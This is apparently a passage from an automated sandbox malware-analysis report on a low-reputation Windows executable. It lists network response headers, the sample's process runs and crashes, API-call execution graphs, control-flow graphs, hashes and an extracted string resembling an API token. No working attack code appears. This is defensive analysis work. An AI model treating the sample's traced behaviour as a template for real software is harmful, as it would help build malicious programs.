                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nc4FFEtSJdUlS%2BSGdg7SCNEg2M7Zt2k%2BnaudzB%2BQxg29LrQOh6aZLNXO45eE6KDwEOhndbB6Zp2ImYKovL4TZmBKoklBcx9PWnnbYIGjYtZE8aH7TV7oERUxp88Xs3AWl%2BamZw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8d22f216fea0c434-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      2024-10-13 23:00:25 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                      Data Ascii: aerror #D12
                                                                                                                      2024-10-13 23:00:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 0


                                                                                                                      Statistics

                                                                                                                      CPU Usage

                                                                                                                      Click to jump to process

                                                                                                                      Memory Usage

                                                                                                                      Click to jump to process

                                                                                                                      High Level Behavior Distribution

                                                                                                                      Click to dive into process behavior distribution

                                                                                                                      Behavior

                                                                                                                      Click to jump to process

                                                                                                                      System Behavior

                                                                                                                      General

                                                                                                                      Target ID:0
                                                                                                                      Start time:19:00:18
                                                                                                                      Start date:13/10/2024
                                                                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                      Imagebase:0x650000
                                                                                                                      File size:3'038'720 bytes
                                                                                                                      MD5 hash:3375809439F79695FACBF3D39D867A8B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:5
                                                                                                                      Start time:19:00:24
                                                                                                                      Start date:13/10/2024
                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7364 -s 1888
                                                                                                                      Imagebase:0xad0000
                                                                                                                      File size:483'680 bytes
                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:10
                                                                                                                      Start time:20:47:08
                                                                                                                      Start date:13/10/2024
                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7364 -s 1940
                                                                                                                      Imagebase:0xad0000
                                                                                                                      File size:483'680 bytes
                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Disassembly

                                                                                                                      Reset < >

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:2.7%
                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                        Signature Coverage:35.9%
                                                                                                                        Total number of Nodes:206
                                                                                                                        Total number of Limit Nodes:16
                                                                                                                        execution_graph 7920 663be2 7921 663be9 7920->7921 7922 663ea3 7921->7922 7925 663e36 7921->7925 7926 695bb0 LdrInitializeThunk 7921->7926 7922->7925 7927 695bb0 LdrInitializeThunk 7922->7927 7926->7922 7927->7925 7650 662fe0 7652 662ffa 7650->7652 7651 663377 7652->7650 7652->7651 7654 6634cc 7652->7654 7671 693220 7652->7671 7675 679510 7654->7675 7656 663674 7683 679bb0 7656->7683 7672 6932ac 7671->7672 7673 693236 7671->7673 7674 6932a2 RtlFreeHeap 7671->7674 7672->7652 7673->7674 7674->7672 7676 67956e 7675->7676 7676->7676 7687 699760 7676->7687 7678 6798f7 7680 679908 7678->7680 7691 676cc0 7678->7691 7680->7656 7681 679768 7681->7678 7681->7680 7682 699760 LdrInitializeThunk 7681->7682 7682->7678 7684 679c51 7683->7684 7700 6742b0 7684->7700 7686 679e05 7688 699780 7687->7688 7689 69989e 7688->7689 7694 695bb0 LdrInitializeThunk 7688->7694 7689->7681 7695 6995b0 7691->7695 7693 676d15 7694->7689 7697 6995d0 7695->7697 7696 69970e 7696->7693 7697->7696 7699 695bb0 LdrInitializeThunk 7697->7699 7699->7696 7701 6742c0 7700->7701 7702 699760 LdrInitializeThunk 7701->7702 7703 674319 7702->7703 7704 676cc0 LdrInitializeThunk 7703->7704 7705 6743d7 7703->7705 7704->7705 7705->7686 7890 66d760 7891 66d773 7890->7891 7892 6995b0 LdrInitializeThunk 7891->7892 7893 66d92d 7892->7893 7804 66d961 7805 66d96e 7804->7805 7806 6999d0 LdrInitializeThunk 7805->7806 7807 66d983 7806->7807 7807->7807 7706 662f6f CoInitializeSecurity 7811 693920 7813 69393c 7811->7813 7812 693a42 7813->7812 7815 695bb0 LdrInitializeThunk 7813->7815 7815->7812 7792 6668ab 7793 6668aa 7792->7793 7793->7792 7795 6934d0 7793->7795 7796 6934e1 7795->7796 7797 69359e 7795->7797 7796->7797 7799 695bb0 LdrInitializeThunk 7796->7799 7797->7793 7799->7797 7865 660228 7866 660242 7865->7866 7869 660455 7865->7869 7870 660308 7865->7870 7867 695700 RtlFreeHeap 7866->7867 7866->7869 7866->7870 7867->7869 7868 695700 RtlFreeHeap 7868->7870 7869->7868 7707 65edb5 7709 65edd0 7707->7709 7711 65fca0 7709->7711 7713 65fcdc 7711->7713 7712 65ef70 7713->7712 7714 693220 RtlFreeHeap 7713->7714 7714->7712 7816 666536 7819 66655c 7816->7819 7818 6668a4 7818->7818 7820 6932c0 7819->7820 7821 6932f0 7820->7821 7824 69333e 7821->7824 7828 695bb0 LdrInitializeThunk 7821->7828 7823 693220 RtlFreeHeap 7826 693492 7823->7826 7825 6933fe 7824->7825 7824->7826 7829 695bb0 LdrInitializeThunk 7824->7829 7825->7823 7826->7818 7828->7824 7829->7825 7737 6995b0 7739 6995d0 7737->7739 7738 69970e 7739->7738 7741 695bb0 LdrInitializeThunk 7739->7741 7741->7738 7879 666ebf 7883 666a52 7879->7883 7880 693220 RtlFreeHeap 7880->7883 7883->7879 7883->7880 7884 693630 7883->7884 7888 695bb0 LdrInitializeThunk 7883->7888 7885 6936be 7884->7885 7886 693640 7884->7886 7885->7883 7886->7885 7889 695bb0 LdrInitializeThunk 7886->7889 7888->7883 7889->7885 7830 66d93c 7831 6998f0 LdrInitializeThunk 7830->7831 7832 66d952 7831->7832 7894 664b3c 7895 664b40 7894->7895 7896 6742b0 LdrInitializeThunk 7895->7896 7897 665a97 7895->7897 7896->7897 7800 667c84 7801 667c89 7800->7801 7802 693220 RtlFreeHeap 7801->7802 7803 667c96 7802->7803 7931 6683ce 7933 668403 7931->7933 7932 66846d 7933->7932 7935 695bb0 LdrInitializeThunk 7933->7935 7935->7933 7850 694a40 7853 694a77 7850->7853 7851 694ad8 7856 694b6d 7851->7856 7859 693e30 7851->7859 7853->7851 7858 695bb0 LdrInitializeThunk 7853->7858 7855 694b29 7855->7856 7863 695bb0 LdrInitializeThunk 7855->7863 7858->7851 7861 693e45 7859->7861 7860 693ed0 7860->7855 7861->7860 7864 695bb0 LdrInitializeThunk 7861->7864 7863->7856 7864->7860 7871 668e0d 7872 668e42 7871->7872 7874 668ea4 7872->7874 7877 695bb0 LdrInitializeThunk 7872->7877 7875 668fa3 7874->7875 7878 695bb0 LdrInitializeThunk 7874->7878 7877->7872 7878->7874 7898 66e30b 7899 66e320 7898->7899 7901 66e34e 7898->7901 7900 693e30 LdrInitializeThunk 7899->7900 7900->7901 7904 66e560 7901->7904 7905 693e30 LdrInitializeThunk 7901->7905 7902 693220 RtlFreeHeap 7903 66e5a2 7902->7903 7904->7902 7908 66e41c 7905->7908 7906 693e30 LdrInitializeThunk 7906->7908 7907 693220 RtlFreeHeap 7907->7908 7908->7904 7908->7906 7908->7907 7909 66e56a 7908->7909 7910 693220 RtlFreeHeap 7909->7910 7910->7904 7784 669809 7787 699410 7784->7787 7786 669848 7788 699430 7787->7788 7789 69954e 7788->7789 7791 695bb0 LdrInitializeThunk 7788->7791 7789->7786 7791->7789 7760 66d457 7761 6995b0 LdrInitializeThunk 7760->7761 7762 66d46b 7761->7762 7763 66d4a9 7762->7763 7765 66d47a 7762->7765 7767 66d4d6 7762->7767 7770 6998f0 7762->7770 7763->7765 7763->7767 7774 6999d0 7763->7774 7767->7765 7780 695bb0 LdrInitializeThunk 7767->7780 7769 66d6db 7772 699918 7770->7772 7771 69997e 7771->7763 7772->7771 7781 695bb0 LdrInitializeThunk 7772->7781 7777 6999f5 7774->7777 7775 699b0e 7775->7767 7776 699a5f 7776->7775 7783 695bb0 LdrInitializeThunk 7776->7783 7777->7776 7782 695bb0 LdrInitializeThunk 7777->7782 7780->7769 7781->7771 7782->7776 7783->7775 7715 65d110 7719 65d119 7715->7719 7716 65d2ee 7717 65d2e9 7724 6956e0 7717->7724 7719->7716 7719->7717 7723 662f10 CoInitialize 7719->7723 7727 697180 7724->7727 7726 6956e5 FreeLibrary 7726->7716 7728 697189 7727->7728 7728->7726 7944 660b93 7945 693220 RtlFreeHeap 7944->7945 7946 660b99 7945->7946 7947 666f91 7948 666fbc 7947->7948 7949 66702a 7948->7949 7953 695bb0 LdrInitializeThunk 7948->7953 7954 695bb0 LdrInitializeThunk 7949->7954 7952 6670d1 7953->7949 7954->7952 7729 6999d0 7732 6999f5 7729->7732 7730 699b0e 7731 699a5f 7731->7730 7736 695bb0 LdrInitializeThunk 7731->7736 7732->7731 7735 695bb0 LdrInitializeThunk 7732->7735 7735->7731 7736->7730 7742 66049b 7743 660227 7742->7743 7746 660455 7743->7746 7747 660308 7743->7747 7748 695700 7743->7748 7745 695700 RtlFreeHeap 7745->7747 7746->7745 7749 69571b 7748->7749 7750 695729 7748->7750 7749->7750 7751 693220 RtlFreeHeap 7749->7751 7750->7746 7751->7750 7836 66811b 7841 699b60 7836->7841 7838 66814a 7839 6681ea 7838->7839 7847 695bb0 LdrInitializeThunk 7838->7847 7842 699b85 7841->7842 7844 699bef 7842->7844 7848 695bb0 LdrInitializeThunk 7842->7848 7843 699c9e 7843->7838 7844->7843 7849 695bb0 LdrInitializeThunk 7844->7849 7847->7838 7848->7844 7849->7843

                                                                                                                        Executed Functions

                                                                                                                        Function 0065FCA0 Relevance: 6.6, Strings: 5, Instructions: 373COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 236 65fca0-65fcda 237 65fcdc-65fcdf 236->237 238 65fd0b-65fe22 236->238 241 65fce0-65fd09 call 662690 237->241 239 65fe24 238->239 240 65fe5b-65fe8c 238->240 242 65fe30-65fe59 call 662760 239->242 243 65feb6-65fec5 call 660b50 240->243 244 65fe8e-65fe8f 240->244 241->238 242->240 252 65feca-65fecf 243->252 247 65fe90-65feb4 call 662700 244->247 247->243 254 65fed5-65fef8 252->254 255 65ffe4-65ffe6 252->255 257 65ff2b-65ff2d 254->257 258 65fefa 254->258 256 6601b1-6601bb 255->256 259 65ff30-65ff3a 257->259 260 65ff00-65ff29 call 6627e0 258->260 262 65ff41-65ff49 259->262 263 65ff3c-65ff3f 259->263 260->257 265 6601a2-6601ad call 693220 262->265 266 65ff4f-65ff76 262->266 263->259 263->262 265->256 267 65ff78 266->267 268 65ffab-65ffb5 266->268 270 65ff80-65ffa9 call 662840 267->270 271 65ffb7-65ffbb 268->271 272 65ffeb 268->272 270->268 276 65ffc7-65ffcb 271->276 274 65ffed-65ffef 272->274 277 65fff5-66002c 274->277 278 66019a 274->278 276->278 280 65ffd1-65ffd8 276->280 283 66002e-66002f 277->283 284 66005b-660065 277->284 278->265 281 65ffde 280->281 282 65ffda-65ffdc 280->282 285 65ffc0-65ffc5 281->285 286 65ffe0-65ffe2 281->286 282->281 287 660030-660059 call 6628a0 283->287 288 660067-66006f 284->288 289 6600a4 284->289 285->274 285->276 286->285 287->284 292 660087-66008b 288->292 290 6600a6-6600a8 289->290 290->278 293 6600ae-6600c5 290->293 292->278 295 660091-660098 292->295 298 6600c7 293->298 299 6600fb-660102 293->299 296 66009e 295->296 297 66009a-66009c 295->297 300 660080-660085 296->300 301 6600a0-6600a2 296->301 297->296 302 6600d0-6600f9 call 662900 298->302 303 660104-66010d 299->303 304 660130-66013c 299->304 300->290 300->292 301->300 302->299 307 660117-66011b 303->307 305 6601c2-6601c7 304->305 305->265 307->278 309 66011d-660124 307->309 310 660126-660128 309->310 311 66012a 309->311 310->311 312 660110-660115 311->312 313 66012c-66012e 311->313 312->307 314 660141-660143 312->314 313->312 314->278 315 660145-66015b 314->315 315->305 316 66015d-66015f 315->316 317 660163-660166 316->317 318 6601bc 317->318 319 660168-660188 call 662030 317->319 318->305 322 660192-660198 319->322 323 66018a-660190 319->323 322->305 323->317 323->322
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1578324382.0000000000651000.00000040.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1578304922.0000000000650000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578360219.00000000006B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578377219.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578391508.00000000006BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578405596.00000000006BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578495322.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578509899.0000000000823000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578527080.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578540509.000000000083E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578553959.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578553959.000000000084B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578582034.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578595729.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578609286.0000000000853000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578622742.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578638320.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578652039.0000000000864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578668898.0000000000879000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578682258.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578696493.0000000000885000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578711977.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578728918.00000000008A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578742998.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578756997.00000000008AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578771362.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578785845.00000000008BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578799697.00000000008C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578813061.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578826126.00000000008CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578844872.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578860247.00000000008DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578873305.00000000008DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578887150.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578900029.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578914604.00000000008EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578930487.00000000008FC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578943142.00000000008FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578958132.000000000090B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578971539.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578971539.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579008014.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579022191.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579034824.0000000000957000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579034824.000000000095F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579063116.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579077547.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_650000_file.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: J|BJ$K6lOIIoT178VADmpH2iwMP7nsotQSL75jipN8qhG5Ck-1728860423-0.0.1.1-/api$V$VY^_$t
                                                                                                                        • API String ID: 0-3816280238
                                                                                                                        • Opcode ID: 57d47579f1bb7daa903be7e00d4e95ef540a5a5d8f8d1a123ac39514b24c87b4
                                                                                                                        • Instruction ID: c5ca05e2d127d8634e010e17cc235217b2892b148a4f4c3231f9465625ba1c85
                                                                                                                        • Opcode Fuzzy Hash: 57d47579f1bb7daa903be7e00d4e95ef540a5a5d8f8d1a123ac39514b24c87b4
                                                                                                                        • Instruction Fuzzy Hash: 26D1567450C3809BE311DF54949065FBBE2AB96B49F14886CE8C98B352D336CD09DB92
                                                                                                                        Function 0066049B Relevance: .3, Instructions: 264COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 380 66049b-660515 call 65c9f0 384 660246-660260 380->384 385 660386-66038c 380->385 386 660227-66023b 380->386 387 660242-660244 380->387 388 660482-660484 380->388 389 660440-660458 call 695700 380->389 390 660480 380->390 391 6603ec-6603f4 380->391 392 660308-66030c 380->392 393 660356 380->393 394 660417-660430 380->394 395 660472-660477 380->395 396 660393-660397 380->396 397 660370-66037e 380->397 398 6603d0-6603d7 380->398 399 660311-660332 380->399 400 6603be 380->400 401 6603de-6603e3 380->401 402 66035f-660367 380->402 403 66051c-66051e 380->403 404 66045b-660469 call 695700 380->404 405 6603fb-660414 380->405 406 660339-66034f 380->406 409 660294 384->409 410 660262 384->410 385->388 385->390 385->395 385->396 386->384 386->385 386->387 386->388 386->389 386->390 386->391 386->392 386->393 386->394 386->395 386->396 386->397 386->398 386->399 386->400 386->401 386->402 386->404 386->405 386->406 407 660296-6602bd 387->407 412 66048d-660496 388->412 389->404 391->388 391->390 391->395 391->396 391->405 392->412 393->402 394->389 395->390 414 6603a0-6603b7 396->414 397->385 398->385 398->388 398->390 398->391 398->394 398->395 398->396 398->401 398->405 399->385 399->388 399->389 399->390 399->391 399->393 399->394 399->395 399->396 399->397 399->398 399->400 399->401 399->402 399->404 399->405 399->406 400->398 401->391 402->397 408 660520 403->408 404->395 405->394 406->385 406->388 406->389 406->390 406->391 406->393 406->394 406->395 406->396 406->397 406->398 406->400 406->401 406->402 406->404 406->405 416 6602bf 407->416 417 6602ea-660301 407->417 425 660529-660b30 408->425 409->407 415 660270-660292 call 662eb0 410->415 412->408 414->385 414->388 414->389 414->390 414->391 414->394 414->395 414->396 414->398 414->400 414->401 414->404 414->405 415->409 427 6602c0-6602e8 call 662e70 416->427 417->385 417->388 417->389 417->390 417->391 417->392 417->393 417->394 417->395 417->396 417->397 417->398 417->399 417->400 417->401 417->402 417->404 417->405 417->406 427->417
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1578324382.0000000000651000.00000040.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1578304922.0000000000650000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578360219.00000000006B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578377219.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578391508.00000000006BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578405596.00000000006BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578495322.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578509899.0000000000823000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578527080.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578540509.000000000083E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578553959.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578553959.000000000084B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578582034.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578595729.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578609286.0000000000853000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578622742.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578638320.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578652039.0000000000864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578668898.0000000000879000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578682258.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578696493.0000000000885000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578711977.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578728918.00000000008A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578742998.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578756997.00000000008AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578771362.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578785845.00000000008BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578799697.00000000008C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578813061.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578826126.00000000008CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578844872.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578860247.00000000008DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578873305.00000000008DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578887150.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578900029.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578914604.00000000008EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578930487.00000000008FC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578943142.00000000008FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578958132.000000000090B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578971539.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578971539.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579008014.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579022191.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579034824.0000000000957000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579034824.000000000095F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579063116.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579077547.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_650000_file.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d88bcf6bfab8a4791763ab5016cec846bcb90ddd85045c8fba98a1be3f9cd4c0
                                                                                                                        • Instruction ID: bcafd36bbbccb187d0e37bcff3ff8e1af3d944007497d02f1a981afc0c84f1d1
                                                                                                                        • Opcode Fuzzy Hash: d88bcf6bfab8a4791763ab5016cec846bcb90ddd85045c8fba98a1be3f9cd4c0
                                                                                                                        • Instruction Fuzzy Hash: DD916975200B00CFD7248F25E8A4A17B7FAFF89310B118A6DE856CBAA1DB71F815CB50
                                                                                                                        Function 00660228 Relevance: .2, Instructions: 218COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
